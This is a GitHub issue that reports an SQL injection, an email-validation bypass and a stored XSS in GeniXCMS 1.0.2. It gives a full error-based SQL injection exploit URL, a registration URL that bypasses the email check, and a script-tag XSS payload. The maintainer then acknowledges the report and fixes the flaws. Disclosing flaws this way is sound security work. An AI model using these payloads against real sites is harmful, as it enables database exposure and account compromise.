Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2 #72

Closed
Hecbi opened this issue Apr 25, 2017 · 1 comment
Closed
Assignees
Labels

Comments

@Hecbi
Copy link

Hecbi commented Apr 25, 2017

SQL Injection

I find a SQL injection at /inc/lib/Control/Backend/menus.control.php
https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Control/Backend/menus.control.php line 247

$sql = sprintf("DELETE FROM `menus` WHERE `menuid` = '%s' ", $_GET['menuid']);
Db::query($sql);

Go http://localhost/gxadmin/index.php?page=menus , find a menus and click del button. Change the position of menuid and token, change menuid into : menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'

exp:/CMS/GeniXCMS-master/gxadmin/index.php?page=menus&token=eMEfQ9xolysmPbu6Ru1EP13Okkqt0A7FeDO8vjCWo1rpshooHHNy9DsCEqV1qtk3poFGcqkhiR0xxKyv&act=remove&menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'

image

Don't forget to get a active csrftoken.

Mailbox validation logic vulnerabilities

And there is another vulnerability in register.php line 56
https://github.com/semplon/GeniXCMS/blob/master/register.php

    if (!User::isEmail($_POST['email'])) {
        $alertDanger[] = MSG_USER_EMAIL_EXIST;
    }
    public static function isEmail($vars)
    {
        if (isset($_GET['act']) && $_GET['act'] == 'edit') {
            $id = Typo::int($_GET['id']);
            $where = "AND `id` != '{$id}' ";
        } else {
            $where = '';
        }
        $vars = sprintf('%s', Typo::cleanX($vars));
        $sql = sprintf("SELECT * FROM `user` WHERE `email` = '%s' %s", $vars, $where);
        $e = Db::result($sql);
        if (Db::$num_rows > 0) {
            return false;
        } else {
            return true;
        }
    }

So i can register a new user with email in id1 by using register.php?act=edit&id=1

XSS

Register a user and reply to an post with XSS payload, eg: <script>alert(2)</script>
When the administrator into the background to view this comment, and move the mouse up, XSS will take effect.
image

@Hecbi Hecbi changed the title SQL Injection in version 1.0.2 SQL Injection and a bug in version 1.0.2 Apr 26, 2017
@Hecbi Hecbi changed the title SQL Injection and a bug in version 1.0.2 SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2 Apr 26, 2017
@semplon semplon self-assigned this Sep 5, 2017
@semplon
Copy link
Owner

semplon commented Sep 5, 2017

thank you for reporting the issue. i will fix this issue soon.

semplon pushed a commit that referenced this issue Sep 5, 2017
major update version 1.1.0
#72 bugfix
#76 bugfix
#78 bugfix
improving more securities and add more GneeX theme features
@semplon semplon closed this as completed Sep 5, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants